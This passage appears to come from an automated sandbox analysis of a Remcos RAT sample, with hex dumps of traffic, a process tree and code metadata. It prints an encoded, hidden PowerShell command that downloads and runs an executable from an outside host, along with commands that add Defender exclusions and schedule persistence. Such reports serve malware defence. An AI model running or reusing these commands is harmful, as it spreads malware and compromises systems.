2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 00 00 06 2a d0 d6 00 00 06 26 2a 00 00 22 02 28 0c 00 00 0a 00 2a 00 00 00 36 28 48 00 00 06 2a d0 d8 00 00 06 26 2a 00 00 46 02 28 0c 00 00 0a 00 00 02 03 28 db 00 00 06 00 2a 00 00 1e 02 7b 3e 00 00 04 2a 22 02 03 7d 3e 00 00 04 2a 00 00 00 1e 02 7b 41 00 00 04 2a 22 02 03 7d 41 00 00 04 2a 00 00 00 46 02 28 0c 00 00 0a 00 00 02 03 28 dd 00 00 06 00 2a 00 00 36 28 48 00 00 06 2a d0 df 00 00 06 26 2a 00 00 46 02 28 0c 00 00 0a 00 00 02 03 28 e2 00 00 06 00 2a 00 00 1e 02 7b 42 00 00 04 2a 22 02 03 7d 42 00 00 04 2a 00 00 00 36 28 48 00 00 06 2a d0 e3 00 00 06 26 2a 00 00 6e 02 28 0c 00 00 0a 00 00 02 03 28 e6 00 00 06 00 02 04 28 e8 00 00 06 2b 00 00 2a 1e 02 7b 43 00 00 04 2a 22 02 03 7d 43 00 00 04 2a 00 00 00 1e 02 7b 44 00 00 04 2a 22 02 03 7d 44 00 Data Ascii: &"(6(H&F(({>"}>{A"}AF((6(H&F(({B"}B6(H&n(((+{C"}C{D"}D
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 11 00 02 7b 5d 00 00 04 0a 06 2a 00 00 36 28 48 00 00 06 2a d0 43 01 00 06 26 2a 00 00 13 30 02 00 8e 00 00 00 37 00 00 11 7e 07 00 00 04 13 06 1a 13 05 11 05 45 08 00 00 00 4a 00 00 00 49 00 00 00 3c 00 00 00 5b 00 00 00 00 00 00 00 5b 00 00 00 24 00 00 00 1f 00 00 00 00 02 28 44 01 00 06 0a 7e 5e 00 00 0a 0c 12 02 06 8c 4f 00 00 01 28 5f 00 00 0a 16 fe 01 0b 1c 13 05 2b b5 07 2c 05 18 13 05 2b ad 11 06 20 bf 00 00 00 93 20 73 77 00 00 59 2b ec 00 06 73 60 00 00 0a 0d 1b 13 05 2b 90 00 72 8b 02 00 70 02 28 19 00 00 0a 73 61 00 00 0a 7a 09 2a 00 00 1b 30 04 00 2d 00 00 00 38 00 00 11 00 2b 00 00 02 02 8e 69 16 20 00 00 03 00 28 45 01 00 06 0a 06 73 60 00 00 0a 0b de 0c 2b 00 26 00 28 62 00 00 0a 0b de 00 2b 00 07 2a 00 00 00 01 10 00 00 00 00 01 00 1c 1d Data Ascii: {]6(HC&07~EJI<[[$(D~^O(_+,+ swY+s`+rp(saz0-8+i (Es`+&(b+*
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 02 00 00 07 0a 00 00 6b 09 00 00 1d 07 00 00 96 00 00 00 21 08 00 00 b8 05 00 00 80 07 00 00 75 06 00 00 df 07 00 00 2b 0a 00 00 10 09 00 00 e9 04 00 00 62 0b 00 00 5c 06 00 00 30 00 00 00 d9 04 00 00 13 0d 00 00 00 d0 59 00 00 02 28 04 00 00 0a 73 c9 00 00 0a 0a 02 73 12 02 00 06 7d 82 00 00 04 02 73 c4 01 00 06 7d 86 00 00 04 1f 5b 13 22 38 51 fe ff ff 02 73 c4 01 00 06 7d 85 00 00 04 02 73 74 01 00 06 7d 84 00 00 04 02 73 fd 01 00 06 7d 83 00 00 04 02 7b 82 00 00 04 6f ac 00 00 0a 1d 13 22 38 1d fe ff ff 00 02 28 ac 00 00 0a 00 02 7b 82 00 00 04 28 ca 00 00 0a 6f cb 00 00 0a 00 02 7b 82 00 00 04 28 ca 00 00 0a 6f 1b 02 00 06 1f 50 13 22 38 eb fd ff ff 00 02 7b 82 00 00 04 28 cc 00 00 0a 6f 1d 02 00 06 00 02 7b 82 00 00 04 6f bb 00 00 0a 02 7b 86 00 00 Data Ascii: k!u+b\0Y(ss}s}["8Qs}st}s}{o"8({(o{(oP"8{(o{o{
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 00 85 00 00 00 00 00 00 00 56 00 00 00 10 00 00 00 6a 00 00 00 85 00 00 00 00 02 7b 8c 00 00 04 03 9a 04 6f ea 01 00 06 00 03 0b 18 0d 2b b8 07 0a 06 45 04 00 00 00 0e 00 00 00 1b 00 00 00 1e 00 00 00 25 00 00 00 11 04 1f 22 93 20 29 37 00 00 59 0d 2b 92 11 05 1f 7f 93 20 2a 8c 00 00 59 2b f0 1b 2b ed 11 06 1f 24 91 2b e6 16 2b e3 11 06 20 92 00 00 00 91 20 be 00 00 00 59 0d 38 64 ff ff ff 02 28 a0 01 00 06 00 11 07 20 de 01 00 00 91 20 b3 00 00 00 59 0d 38 49 ff ff ff 02 28 a1 01 00 06 00 11 07 20 d1 00 00 00 91 20 9b 00 00 00 59 0d 38 2e ff ff ff 02 28 a2 01 00 06 00 11 07 1f 62 91 1f 09 5b 0d 38 19 ff ff ff 02 28 a3 01 00 06 00 17 0d 38 0b ff ff ff 2a 13 30 02 00 59 01 00 00 5c 00 00 11 7e 3b 00 00 04 13 05 7e d4 00 00 04 13 06 7e 07 00 00 04 13 07 7e Data Ascii: Vj{o+E%" )7Y+ Y++$++ Y8d( Y8I( Y8.(b[8(80Y\~;~~~
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 11 7e 3b 00 00 04 13 05 7e 5c 00 00 04 13 06 7e 07 00 00 04 13 07 7e 40 00 00 04 13 08 7e d4 00 00 04 13 09 18 13 04 11 04 45 0c 00 00 00 9a 00 00 00 43 00 00 00 00 00 00 00 08 00 00 00 a8 00 00 00 a8 00 00 00 d9 00 00 00 34 00 00 00 98 00 00 00 e4 00 00 00 6b 00 00 00 1f 00 00 00 00 04 75 66 00 00 01 0a 06 6f 87 00 00 0a 20 00 00 10 00 fe 01 16 fe 01 0b 1f 0b 13 04 2b aa 07 2c 0f 11 05 1f 18 93 20 e1 d9 00 00 59 13 04 2b 98 17 2b f9 11 06 1f 44 93 20 b1 d8 00 00 59 13 04 2b 86 02 28 00 01 00 0a 6f 7c 00 00 0a 18 fe 01 0c 08 2c 09 1f 0a 13 04 38 6b ff ff ff 11 07 1f 75 93 20 96 4c 00 00 59 2b ec 00 02 28 00 01 00 0a 16 6f 91 00 00 0a 00 02 7b a3 00 00 04 02 7b 9d 00 00 04 1a 6f fe 00 00 0a 6f ff 00 00 0a 1e 13 04 38 31 ff ff ff 00 00 11 08 1f 76 91 18 5b Data Ascii: ~;~\~~@~EC4kufo +, Y++D Y+(o\|,8ku LY+(o{{oo81v[
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 39 4d 03 00 00 16 13 11 2b ca 00 03 0c 08 0b 07 45 05 00 00 00 0f 00 00 00 7e 00 00 00 9e 01 00 00 02 02 00 00 90 02 00 00 11 12 1f 74 91 20 e3 00 00 00 59 13 11 2b 9c 1c 2b f9 38 df 02 00 00 02 17 7d cb 00 00 04 2b 00 2b 00 00 02 fe 06 d5 01 00 06 73 29 01 00 0a 73 2a 01 00 0a 80 d1 00 00 04 7e d1 00 00 04 6f 2b 01 00 0a 00 00 de 12 2b 00 26 00 7e d1 00 00 04 6f 22 01 00 0a 00 00 de 00 2b 00 17 13 14 11 14 45 05 00 00 00 05 00 00 00 00 00 00 00 05 00 00 00 05 00 00 00 05 00 00 00 38 98 02 00 00 02 16 7d cb 00 00 04 2b 00 2b 00 00 02 fe 06 d5 01 00 06 73 29 01 00 0a 73 2a 01 00 0a 80 d2 00 00 04 7e d2 00 00 04 6f 2b 01 00 0a 00 00 de 12 2b 00 26 00 7e d2 00 00 04 6f 22 01 00 0a 00 00 de 00 2b 00 1f 22 13 16 11 16 45 33 00 00 00 8e 00 00 00 f7 00 00 00 2c Data Ascii: 9M+E~t Y++8}++s)s~o++&~o"+E8}++s)s~o++&~o"+"E3,
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 00 00 00 00 00 00 00 00 00 76 00 00 00 00 03 2c 12 09 20 b3 00 00 00 93 09 20 b3 00 00 00 93 59 0c 2b c4 11 04 1f 14 93 20 03 43 00 00 59 2b f0 02 7b f5 00 00 04 14 fe 03 2b 01 16 0a 06 2c 2d 11 05 1f 56 91 1f 3d 7e 40 00 00 04 1f 36 7e 40 00 00 04 1f 36 91 7e 5c 00 00 04 1f 3b 93 61 20 e5 00 00 00 5f 9c 59 0c 38 7a ff ff ff 11 05 1f 4d 91 1d 5b 2b f1 00 02 7b f5 00 00 04 6f 20 00 00 0a 00 00 17 0c 38 5c ff ff ff 02 03 28 f1 00 00 0a 00 2a 00 13 30 05 00 e5 04 00 00 60 00 00 11 7e 40 00 00 04 0c 7e d4 00 00 04 0d 7e 07 00 00 04 13 04 7e 5c 00 00 04 13 05 7e 3b 00 00 04 13 06 1f 14 0b 07 45 1b 00 00 00 74 00 00 00 81 03 00 00 db 01 00 00 4c 02 00 00 c8 00 00 00 7c 02 00 00 75 01 00 00 29 00 00 00 58 02 00 00 e6 02 00 00 41 00 00 00 ac 03 00 00 df 03 00 00 Data Ascii: v, Y+ CY+{+,-V=~@6~@6~\;a _Y8zM[+{o 8\(*0`~@~~~\~;EtL\|u)XA
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 00 59 2b ec 08 6f 20 00 00 0a 00 17 13 07 2b bd dc 2b 00 19 13 0a 11 0a 45 05 00 00 00 01 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00 08 00 00 00 00 02 03 28 48 01 00 0a 00 2a 00 00 01 10 00 00 02 00 72 00 19 8b 00 49 00 00 00 00 13 30 02 00 69 00 00 00 1a 00 00 11 7e 5c 00 00 04 0d 7e 07 00 00 04 13 04 19 0c 08 45 06 00 00 00 01 00 00 00 3b 00 00 00 1b 00 00 00 00 00 00 00 33 00 00 00 3a 00 00 00 00 02 28 6c 00 00 0a 0a 06 2c 0d 09 1f 33 93 20 da c8 00 00 59 0c 2b ca 1a 2b fa 02 28 6d 00 00 0a 00 11 04 20 ba 00 00 00 93 20 42 84 00 00 59 0c 2b af 02 03 28 02 01 00 0a 00 2a 00 00 00 1b 30 05 00 38 00 00 00 00 00 00 00 00 2b 00 00 00 de 0f 2b 00 26 00 72 79 0b 00 70 73 61 00 00 0a 7a 2b 1f 7e 07 00 00 04 1f 0d 7e 07 00 00 04 1f 0d 93 7e 3b 00 00 04 1f 5f Data Ascii: Y+o ++E(HrI0i~\~E;3:(l,3 Y++(m BY+(08++&rypsaz+~~~;_
2024-07-26 11:03:08 UTC	8000	IN	Data Raw: 33 74 78 f0 ba 34 ec 47 10 e2 79 8e 43 e8 d7 2c 9a 46 db d3 12 91 95 91 8f 5e d5 37 95 b8 25 ca 03 63 74 fe 21 01 07 05 28 6b 19 f9 96 a5 05 2a 78 88 17 1b 11 2f f2 9e 45 a5 d1 3d 57 0b dc 60 61 68 33 02 70 57 72 14 f5 d9 cb b5 d4 b8 b3 e4 cc 7f 24 37 c1 d5 c5 3c 54 d8 d6 99 a9 b4 74 e3 78 a8 24 98 e8 2c a2 a3 44 bc 0f 51 96 38 46 b0 b9 56 29 e3 97 63 a9 7e 04 cb 45 b5 90 06 9e 39 dc 30 f6 20 28 cd 13 94 8f b1 76 55 79 26 72 41 67 fa bc 71 b1 80 62 ad 0e f5 17 49 0d a5 9a a2 36 32 3e 77 0e 70 1e 75 32 1b 27 ad 10 04 07 ae 8f a6 76 7a 15 ef 37 4a 25 73 99 bb 3d 87 b4 87 09 58 92 91 98 b4 5a 16 c4 88 8d ce 50 89 be 67 40 2d c3 fa 6d 2a 6b be f2 04 47 da 72 a3 cb 7a cd ca 3e f8 7a 96 ad b1 d8 34 14 20 fd b2 99 78 3b 8b 6b 9e 27 8f 53 82 a4 78 52 86 a2 4e 79 Data Ascii: 3tx4GyC,F^7%ct!(kx/E=W`ah3pWr$7<Ttx$,DQ8FV)c~E90 (vUy&rAgqbI62>wpu2'vz7J%s=XZPg@-mkGrz>z4 x;k'SxRNy

Target ID:	0
Start time:	07:03:03
Start date:	26/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Imagebase:	0x7ff631960000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:03:03
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:03:03
Start date:	26/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:03:08
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\PuttyTest777.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\PuttyTest777.pif"
Imagebase:	0x80000
File size:	961'544 bytes
MD5 hash:	3F69729A8F2B22E625BB984F28758EBC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1748001168.0000000003729000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:03:08
Start date:	26/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:03:10
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"
Imagebase:	0x6c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:03:10
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:03:10
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Imagebase:	0x6c0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:03:10
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x4b0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:03:10
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp"
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:03:11
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:03:11
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\PuttyTest777.pif
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\PuttyTest777.pif"
Imagebase:	0xba0000
File size:	961'544 bytes
MD5 hash:	3F69729A8F2B22E625BB984F28758EBC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.4092646965.0000000001238000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:03:12
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\HODoCxSdp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\HODoCxSdp.exe
Imagebase:	0x300000
File size:	961'544 bytes
MD5 hash:	3F69729A8F2B22E625BB984F28758EBC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1787198536.0000000003869000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:03:13
Start date:	26/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:03:15
Start date:	26/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp"
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:03:15
Start date:	26/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:03:15
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\HODoCxSdp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Imagebase:	0xe0000
File size:	961'544 bytes
MD5 hash:	3F69729A8F2B22E625BB984F28758EBC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:03:15
Start date:	26/07/2024
Path:	C:\Users\user\AppData\Roaming\HODoCxSdp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Imagebase:	0xa60000
File size:	961'544 bytes
MD5 hash:	3F69729A8F2B22E625BB984F28758EBC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1759395246.000000000104A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 00007FFD9B8733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1732236059.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 240e77624845bd21eb498471991253802ac2a52bcd73a2482a697d82a952278d
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 9201A73020CB0C4FD748EF0CE451AA6B3E0FB89324F10056DE58AC36A1DA32E882CB42

Non-executed Functions

Function 00007FFD9B870DF0 Relevance: 5.5, Strings: 4, Instructions: 453COMMON

Download Yara Rule

Strings

^[5, xrefs: 00007FFD9B870F5E
|\, xrefs: 00007FFD9B8710A4
6P_^, xrefs: 00007FFD9B870E01
S^K, xrefs: 00007FFD9B870FFD

Memory Dump Source

Source File: 00000002.00000002.1732236059.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd9b870000_powershell.jbxd

Similarity

API ID:
String ID: |\$6P_^$S^K$^[5
API String ID: 0-2583630782
Opcode ID: 1a8923668119004f883320776550cc063c601700993524ec017d13b28e582551
Instruction ID: 96ce67c43c3607410c1e913062e769cb80877cd1cff7183e5e538970c2a428fb
Opcode Fuzzy Hash: 1a8923668119004f883320776550cc063c601700993524ec017d13b28e582551
Instruction Fuzzy Hash: E0E1B2A7A1F6D64EE723A7A91CF55A53F54EF5722870E00F7C4C44B0E3D814290693A2

Analysis Process: PuttyTest777.pifPID: 2108, Parent PID: 7020COMMON

Execution Graph

Execution Coverage:	13.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.1%
Total number of Nodes:	182
Total number of Limit Nodes:	8

Executed Functions

Function 06F38FA4 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd758c3bb1de31ead4a0cb3e7911ace5a17d4793a8ad6c2a2ba5fec096d5e10
Instruction ID: f3fd7c3f704920ac6a384195aa802dd1d0849a1e74f33315aaa476604f0b9f37
Opcode Fuzzy Hash: 4cd758c3bb1de31ead4a0cb3e7911ace5a17d4793a8ad6c2a2ba5fec096d5e10
Instruction Fuzzy Hash: 81A00162C5E1208EA6900E1050290B9A97C934B592E913204712A660169A9980414AC8

Function 06F358ED Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F35B2E

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 339032928317205df398eb10c05d516384fdbf9820542fb02329e544a4a12b26
Instruction ID: 8a59ecdb7f5ef44f68929ae0370c4895b9fcaa88b72d9a15759145fd7e4b5c64
Opcode Fuzzy Hash: 339032928317205df398eb10c05d516384fdbf9820542fb02329e544a4a12b26
Instruction Fuzzy Hash: EB915CB1D003298FDF60CF68C881BEDBBB2BF88314F148569D849A7240DB749985CFA1

Function 06F358F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F35B2E

Memory Dump Source

Source File: 00000003.00000002.1764615963.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f30000_PuttyTest777.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d7da0b3e4f6a69bade81e44f030dd9d11847e2fc4d50b5c8d3902c06f69ef809
Instruction ID: 1170cb93f6f1bc1c5d52ab91851e284c8e5c37d9cea1437cf413ef6032c00e18
Opcode Fuzzy Hash: d7da0b3e4f6a69bade81e44f030dd9d11847e2fc4d50b5c8d3902c06f69ef809
Instruction Fuzzy Hash: 46914B71D107698FDF60CF68C881BDDBBB2BF88314F148569D849A7240DB749985CF91

Function 008B6314 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 008B63D1

Memory Dump Source

Source File: 00000003.00000002.1739607334.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8b0000_PuttyTest777.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f291b8b7bc9dbb1ce58a085674e5c7d41b169e006f22bd0193bbf068df61527d
Instruction ID: de5e674c59654ccbc45bb7e1fe5014bc0cace198b32b8854cb1c56d5cacc982e
Opcode Fuzzy Hash: f291b8b7bc9dbb1ce58a085674e5c7d41b169e006f22bd0193bbf068df61527d
